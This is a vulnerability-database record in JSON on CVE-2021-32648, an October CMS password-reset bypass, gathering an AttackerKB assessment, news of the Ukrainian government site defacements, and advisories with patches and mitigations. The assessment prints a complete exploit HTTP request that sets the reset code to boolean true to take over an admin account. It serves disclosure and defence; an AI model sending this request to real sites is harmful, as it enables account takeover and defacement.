DATABASE RESOURCES PRICING ABOUT US

{"id": "AKB:EB3F5389-7A37-45E3-AF6F-6C5B475789C9", "vendorId": null, "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-32648", "description": "octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.\n\n \n**Recent assessments:** \n \n**kevthehermit** at January 14, 2022 5:01pm UTC reported:\n\n### Ovewrview\n\nThis is a simple Type Confusion / Juggling vulnerability.\n\nOctober CMS will check to see if the User Supplied reset code matches the value in the database `return ($this->reset_password_code == $resetCode);` \nIf we can send a boolean value in place of a reset code we can bypass this check.\n\nLaravel has a feature that if an HTTP POST request is sent as JSON then It will be converted to a matching form data set however the types will persist.\n\nTo exploit this vulnerability we simply need to set the `Content-Type` to JSON and structure our POST request accordingly. An example POST is shown below.\n \n \n POST /backend/backend/auth/reset/1/[] HTTP/1.1\n Host: 172.17.0.2\n Content-Length: 162\n Cache-Control: max-age=0\n Upgrade-Insecure-Requests: 1\n Origin: http://172.17.0.2\n Content-Type: application/json\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n Referer: http://172.17.0.2/backend/backend/auth/reset/1/a\n Accept-Encoding: gzip, deflate\n Accept-Language: en-GB,en-US;q=0.9,en;q=0.8\n Cookie: october_session=eyJpdiI6ImlGZHMrRTVEUGh6dHkxWllEeVF5dEE9PSIsInZhbHVlIjoiV2tkcmsrbkJxa2R6OWg1TVFLbTQ2Y1pTSG9ZT1RYTEFwdlY0YVVRVEU5a0pxbG5LdE81WVpXeDdGa3pHclhTWGhkbEE2WGZPME82aEpVWFBqcktEakR6Qng3WVpsWUdzYm9mOG9cL0YxTjNXbXFyUEZxWGNVM1BrcmJLaFVIZXVaIiwibWFjIjoiZmVkMDljNGE2MDc2ZGI5NjgyOThkMDJjZGFhNDcxYzg3MTNlNmJhZTRiYmIzZmVkYjNmYTUyMzA4ZjQxMjdiNiJ9\n Connection: close\n \n {\"_session_key\":\"RQjdfLkFotyuA4BHOjVykboK3DHByTyDFEs7xZXC\",\"_token\":\"jBD7MXYuIrYC4n0GClVCigIBrSOShoUICwy3gShS\",\"postback\":1,\"id\":1,\"code\":true,\"password\":\"hello\"}\n \n\n### In the Wild\n\nThis has not been verified but initial reports suggest this vulnerability was used to deface a set of Ukrainian government websites \u2013 <https://twitter.com/KimZetter/status/1481890639029551106>\n\n### PoC\n\nA proof of concept python script that will attempt to reset the password for the admin account has been published \u2013 <https://github.com/Immersive-Labs-Sec/CVE-2021-32648>\n\n### Detection\n\nAn attacker attempting to exploit this attack will need to trigger a password reset email. If you observe password reset emails then check access to the server and respond accordingly.\n\n### Mitigation\n\nApplying the patches will successfully mitigate against this attack.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 5\n", "published": "2021-08-26T00:00:00", "modified": "2021-09-02T00:00:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 6.4}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, "href": "https://attackerkb.com/topics/GNepughGqx/cve-2021-32648", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32648", "https://github.com/octobercms/october/security/advisories/GHSA-mxr5-mc97-63rc", "https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374", "https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9"], "cvelist": ["CVE-2021-32648"], "immutableFields": [], "lastseen": "2022-04-23T02:34:49", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-1061"]}, {"type": "cisa", "idList": ["CISA:D7385BDD2786721598A2135E182282C2"]}, {"type": "cve", "idList": ["CVE-2021-32648"]}, {"type": "github", "idList": ["GHSA-MXR5-MC97-63RC"]}, {"type": "githubexploit", "idList": ["FCAFCDD5-9440-5A5E-A5DD-51F88D1E4FC7"]}, {"type": "hivepro", "idList": ["HIVEPRO:117C06FAB305E3556D7D341CD4305EA7"]}, {"type": "thn", "idList": ["THN:03D48DF1CC21CC194B892C2E186448B5"]}], "rev": 4}, "score": {"value": 5.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-1061"]}, {"type": "cisa", "idList": ["CISA:D7385BDD2786721598A2135E182282C2"]}, {"type": "cve", "idList": ["CVE-2021-32648"]}, {"type": "github", "idList": ["GHSA-MXR5-MC97-63RC"]}, {"type": "githubexploit", "idList": ["FCAFCDD5-9440-5A5E-A5DD-51F88D1E4FC7"]}, {"type": "hivepro", "idList": ["HIVEPRO:117C06FAB305E3556D7D341CD4305EA7"]}, {"type": "thn", "idList": ["THN:03D48DF1CC21CC194B892C2E186448B5"]}]}, "exploitation": null, "vulnersScore": 5.4}, "_state": {"wildexploited": 0, "dependencies": 0}, "_internal": {"wildexploited_cvelist": ["CVE-2021-32648"]}, "attackerkb": {"attackerValue": 2, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {"Other:": "", "Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Other:", "source_url": "https://twitter.com/KimZetter/status/1481890639029551106", "published": "2022-01-14T17:01:00"}, {"category": "Government or Industry Alert", "source_url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "published": "2022-01-25T01:13:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32648"], "Advisory": ["https://github.com/octobercms/october/security/advisories/GHSA-mxr5-mc97-63rc"], "Miscellaneous": ["https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374", "https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9"]}, "tags": ["easy_to_develop", "pre_auth", "default_configuration", "no_useful_data"], "mitre_vector": {}, "last_activity": "2022-01-25T01:13:00"}

{"thn": [{"lastseen": "2022-05-09T12:37:42", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjPrui20H2i9Mmg91xQkaL_C0lzTyQcZJsi6VNWnlu3jBwkpW0bDzeuQDTzZbjO2C96BI6Ofdc_UtTIrnC5OYi0OJEH91V5vlR7zj7Ni4yBSZ8Zt8olInITDcZ3F19m6WHzHnKsC9uGGfMW25PyYm1Fsc9xV3Yx1SemS7VWHdgD9r6KzYS8bO_AO4lO>)\n\nNo fewer than 70 websites operated by the Ukrainian government went offline on Friday for hours in what appears to be a coordinated cyber attack amid heightened tensions with Russia.\n\n\"As a result of a massive cyber attack, the websites of the Ministry of Foreign Affairs and a number of other government agencies are temporarily down,\" Oleg Nikolenko, MFA spokesperson, [tweeted](<https://twitter.com/OlegNikolenko_/status/1481880668195983362>).\n\nThe Security Service of Ukraine, the country's law-enforcement authority, [alluded](<https://ssu.gov.ua/novyny/sbu-rozsliduie-prychetnist-rosiiskykh-spetssluzhb-do-sohodnishnoi-kiberataky-na-orhany-derzhavnoi-vlady-ukrainy>) to a possible Russian involvement, pointing fingers at the hacker groups associated with the Russian secret services while branding the intrusions as a supply chain attack that involved hacking the \"infrastructure of a commercial company that had access to the rights to administer the web resources affected by the attack.\"\n\nPrior to the update from the SSU, the [Ukrainian CERT](<https://cert.gov.ua/article/17899>) claimed that the attacks may have exploited a security vulnerability in Laravel-based October CMS ([CVE-2021-32648](<https://nvd.nist.gov/vuln/detail/CVE-2021-32648>)), which could be abused by an adversary to gain access to an account using a specially crafted request.\n\nThe breach targeted a number of government websites, including those for Ukraine's Cabinet, education, agriculture, emergency, energy, veterans affairs, and environment ministries, among others, 10 websites of which were \"subjected to unauthorized interference.\"\n\nThe security agency, however, stressed that content of the sites was not altered and that no sensitive personal data was stolen.\n\n\"Provocative messages were posted on the main page of the websites,\" the SSU [said](<https://ssu.gov.ua/en/novyny/shchodo-aktak-na-saity-derzhavnykh-orhaniv>). \"The content of the sites was not changed, and, according to preliminary information, no leakage of personal data occurred.\"\n\nThis is far from the first time Russia has set its sights on Ukraine. In December 2015, a nation-state adversary tracked as [Sandworm](<https://malpedia.caad.fkie.fraunhofer.de/actor/sandworm>) [targeted](<https://en.wikipedia.org/wiki/Ukraine_power_grid_hack>) the power grid, resulting in unprecedented blackouts for roughly 230,000 consumers in the nation.\n\nTwo years later, Ukraine was also at the receiving end of the devastating [NotPetya](<https://en.wikipedia.org/wiki/2017_cyberattacks_on_Ukraine>) wiper malware campaign by the Sandworm military hackers that erased confidential data from the computers of banks and energy firms.\n\nThen in November 2021, the SSU [unmasked](<https://thehackernews.com/2021/11/ukraine-identifies-russian-fsb-officers.html>) the real identities of five Russian intelligence officials allegedly involved in over 5,000 cyberattacks attributed to a cyber-espionage group named Gamaredon aimed at public authorities and critical infrastructure located in the country.\n\n\"The purpose of such attacks is to destabilize the internal situation in the country, as well as to sow chaos and disbelief in society,\" the Center for Strategic Communications and Information Security [said](<https://spravdi.gov.ua/ataka-na-uryadovi-sajty-novyj-rozdil-kibervijny-proty-ukrayiny/>), noting the hacks amount to \"psychological pressure and intimidation.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-01-15T06:27:00", "type": "thn", "title": "Massive Cyber Attack Knocks Down Ukrainian Government Websites", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-01-15T07:17:34", "id": "THN:03D48DF1CC21CC194B892C2E186448B5", "href": "https://thehackernews.com/2022/01/massive-cyber-attack-knocks-down.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:29:28", "description": "An authentication bypass vulnerability exists in October CMS. Successful exploitation of this vulnerability would allow remote attackers to obtain sensitive information and gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2022-02-02T00:00:00", "type": "checkpoint_advisories", "title": "October CMS Authentication Bypass (CVE-2021-32648)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-02-02T00:00:00", "id": "CPAI-2021-1061", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "osv": [{"lastseen": "2022-05-11T21:06:01", "description": "### Impact\n\nAn attacker can request an account password reset and then gain access to the account using a specially crafted request.\n\n- To exploit this vulnerability, an attacker must know the username of an administrator and have access to the password reset form.\n\n### Patches\n\n- Issue has been patched in Build 472 and v1.1.5\n- [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648)\n\n### Workarounds\n\nApply https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374 and https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9 to your installation manually if you are unable to upgrade.\n\n[**Update 2022-01-20**] [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) can be found here.\n\n### Recommendations\n\nWe recommend the following steps to make sure your server stays secure:\n\n- Keep server OS and system software up to date.\n- Keep October CMS software up to date.\n- Use a multi-factor authentication plugin.\n- Change the [default backend URL](https://github.com/octobercms/october/blob/1.1/config/cms.php#L39) or block public access to the backend area.\n- Include the [Roave/SecurityAdvisories](https://github.com/Roave/SecurityAdvisories) Composer package to ensure that your application doesn't have installed dependencies with known security vulnerabilities.\n\n### References\n\nBugs found as part of Solar Security CMS Research. Credits to:\n\u2022 Andrey Basarygin\n\u2022 Andrey Guzei\n\u2022 Mikhail Khramenkov\n\u2022 Alexander Sidukov\n\u2022 Maxim Teplykh\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-30T16:13:02", "type": "osv", "title": "Account Takeover in Octobercms", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-02-23T22:21:06", "id": "OSV:GHSA-MXR5-MC97-63RC", "href": "https://osv.dev/vulnerability/GHSA-mxr5-mc97-63rc", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-05-11T21:08:42", "description": "### Impact\n\nAn attacker can exploit this vulnerability to bypass authentication using a specially crafted persist cookie.\n\n- To exploit this vulnerability, an attacker must obtain a Laravel\u2019s secret key for cookie encryption and signing.\n- Due to the logic of how this mechanism works, a targeted user account must be logged in while\nthe attacker is exploiting the vulnerability.\n- Authorization via persist cookie not shown in access logs.\n\n### Patches\n\n- Issue has been patched in Build 472 and v1.1.5\n- [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648)\n\n### Workarounds\n\nApply https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374 and https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9 to your installation manually if you are unable to upgrade.\n\n[**Update 2022-01-20**] [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) can be found here.\n\n### Recommendations\n\nWe recommend the following steps to make sure your server stays secure:\n\n- Keep server OS and system software up to date.\n- Keep October CMS software up to date.\n- Use a multi-factor authentication plugin.\n- Change the [default backend URL](https://github.com/octobercms/october/blob/1.1/config/cms.php#L39) or block public access to the backend area.\n- Include the [Roave/SecurityAdvisories](https://github.com/Roave/SecurityAdvisories) Composer package to ensure that your application doesn't have installed dependencies with known security vulnerabilities.\n\n### References\n\nBugs found as part of Solar Security CMS Research. Credits to:\n\u2022 Andrey Basarygin\n\u2022 Andrey Guzei\n\u2022 Mikhail Khramenkov\n\u2022 Alexander Sidukov\n\u2022 Maxim Teplykh\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-30T16:13:50", "type": "osv", "title": "Auth bypass and account takeover in October CMS", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-29487", "CVE-2021-32648"], "modified": "2022-01-20T15:39:14", "id": "OSV:GHSA-H76R-VGF3-J6W5", "href": "https://osv.dev/vulnerability/GHSA-h76r-vgf3-j6w5", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "hivepro": [{"lastseen": "2022-01-20T15:30:50", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here. A malware attack was carried out on Ukraine government, non-profit, and IT entities with a wiper disguised as ransomware. The threat actor, DEV-0586 targeted government bodies that provide critical executive branch or emergency response functions. The attack using the malware \u201cWhispergate\u201d was preformed in two stages: Stage 1: The malware overwrites the Master Boot Record to display a faked ransom note that requests the payment of a $10,000 ransomware in bitcoin. Stage 2: Stage2.exe is a downloader for second stage malware that corrupts files and is hosted on a Discord channel. After that, the corrupter virus searches for files with hundreds of various extensions, overwrites their contents with a predetermined quantity of 0xCC bytes, and renames each file with an apparently random four-byte extension. This attack is intended to be destructive and designed to render targeted devices inoperable rather than to obtain a ransom. Previously on 13th of January an attack by UNC1151 targeted at least 15 websites belonging to various Ukrainian public institutions were compromised, defaced, and subsequently taken offline. The attackers carried out a supply chain attack by using the vulnerability CVE-2021-32648 in October CMS which is a free content management system. Exploiting this vulnerability, the hackers could send a password reset request for an account in this system and then gain access to it. The attacks are not linked currently but there is a huge possibility that they are carried simultaneously. To mitigate the risk organizations are advised to update October CMS to the latest version and also to monitor the hashes in their system. Actor Details Vulnerability Details Indicators of Compromise (IoCs) Patch Link https://github.com/octobercms/october/security/advisories/GHSA-mxr5-mc97-63rc References https://cert.gov.ua/article/17899 https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ https://securityaffairs.co/wordpress/126782/apt/destructive-malware-campaign-targets-ukraine.html?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=destructive-malware-campaign-targets-ukraine https://ain.ua/en/2022/01/14/hackers-attack-some-ukrainian-government-websites/", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2022-01-17T14:38:43", "type": "hivepro", "title": "Ukraine government entities targeted by a destructive malware \u201cWhispergate\u201d", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-01-17T14:38:43", "id": "HIVEPRO:117C06FAB305E3556D7D341CD4305EA7", "href": "https://www.hivepro.com/ukraine-government-entities-targeted-by-a-destructive-malware-whispergate/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "github": [{"lastseen": "2022-04-15T14:32:22", "description": "### Impact\n\nAn attacker can request an account password reset and then gain access to the account using a specially crafted request.\n\n- To exploit this vulnerability, an attacker must know the username of an administrator and have access to the password reset form.\n\n### Patches\n\n- Issue has been patched in Build 472 and v1.1.5\n- [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648)\n\n### Workarounds\n\nApply https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374 and https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9 to your installation manually if you are unable to upgrade.\n\n[**Update 2022-01-20**] [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) can be found here.\n\n### Recommendations\n\nWe recommend the following steps to make sure your server stays secure:\n\n- Keep server OS and system software up to date.\n- Keep October CMS software up to date.\n- Use a multi-factor authentication plugin.\n- Change the [default backend URL](https://github.com/octobercms/october/blob/1.1/config/cms.php#L39) or block public access to the backend area.\n- Include the [Roave/SecurityAdvisories](https://github.com/Roave/SecurityAdvisories) Composer package to ensure that your application doesn't have installed dependencies with known security vulnerabilities.\n\n### References\n\nBugs found as part of Solar Security CMS Research. Credits to:\n\u2022 Andrey Basarygin\n\u2022 Andrey Guzei\n\u2022 Mikhail Khramenkov\n\u2022 Alexander Sidukov\n\u2022 Maxim Teplykh\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-30T16:13:02", "type": "github", "title": "Account Takeover in Octobercms", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-02-23T22:21:06", "id": "GHSA-MXR5-MC97-63RC", "href": "https://github.com/advisories/GHSA-mxr5-mc97-63rc", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-04-15T14:32:22", "description": "### Impact\n\nAn attacker can exploit this vulnerability to bypass authentication using a specially crafted persist cookie.\n\n- To exploit this vulnerability, an attacker must obtain a Laravel\u2019s secret key for cookie encryption and signing.\n- Due to the logic of how this mechanism works, a targeted user account must be logged in while\nthe attacker is exploiting the vulnerability.\n- Authorization via persist cookie not shown in access logs.\n\n### Patches\n\n- Issue has been patched in Build 472 and v1.1.5\n- [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648)\n\n### Workarounds\n\nApply https://github.com/octobercms/library/commit/016a297b1bec55d2e53bc889458ed2cb5c3e9374 and https://github.com/octobercms/library/commit/5bd1a28140b825baebe6becd4f7562299d3de3b9 to your installation manually if you are unable to upgrade.\n\n[**Update 2022-01-20**] [Shortened patch instructions](https://github.com/daftspunk/CVE-2021-32648) can be found here.\n\n### Recommendations\n\nWe recommend the following steps to make sure your server stays secure:\n\n- Keep server OS and system software up to date.\n- Keep October CMS software up to date.\n- Use a multi-factor authentication plugin.\n- Change the [default backend URL](https://github.com/octobercms/october/blob/1.1/config/cms.php#L39) or block public access to the backend area.\n- Include the [Roave/SecurityAdvisories](https://github.com/Roave/SecurityAdvisories) Composer package to ensure that your application doesn't have installed dependencies with known security vulnerabilities.\n\n### References\n\nBugs found as part of Solar Security CMS Research. Credits to:\n\u2022 Andrey Basarygin\n\u2022 Andrey Guzei\n\u2022 Mikhail Khramenkov\n\u2022 Alexander Sidukov\n\u2022 Maxim Teplykh\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [hello@octobercms.com](mailto:hello@octobercms.com)\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-30T16:13:50", "type": "github", "title": "Auth bypass and account takeover in October CMS", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-29487", "CVE-2021-32648"], "modified": "2022-01-20T15:39:15", "id": "GHSA-H76R-VGF3-J6W5", "href": "https://github.com/advisories/GHSA-h76r-vgf3-j6w5", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T18:30:54", "description": "octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-26T19:15:00", "type": "cve", "title": "CVE-2021-32648", "cwe": ["CWE-287", "CWE-640"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 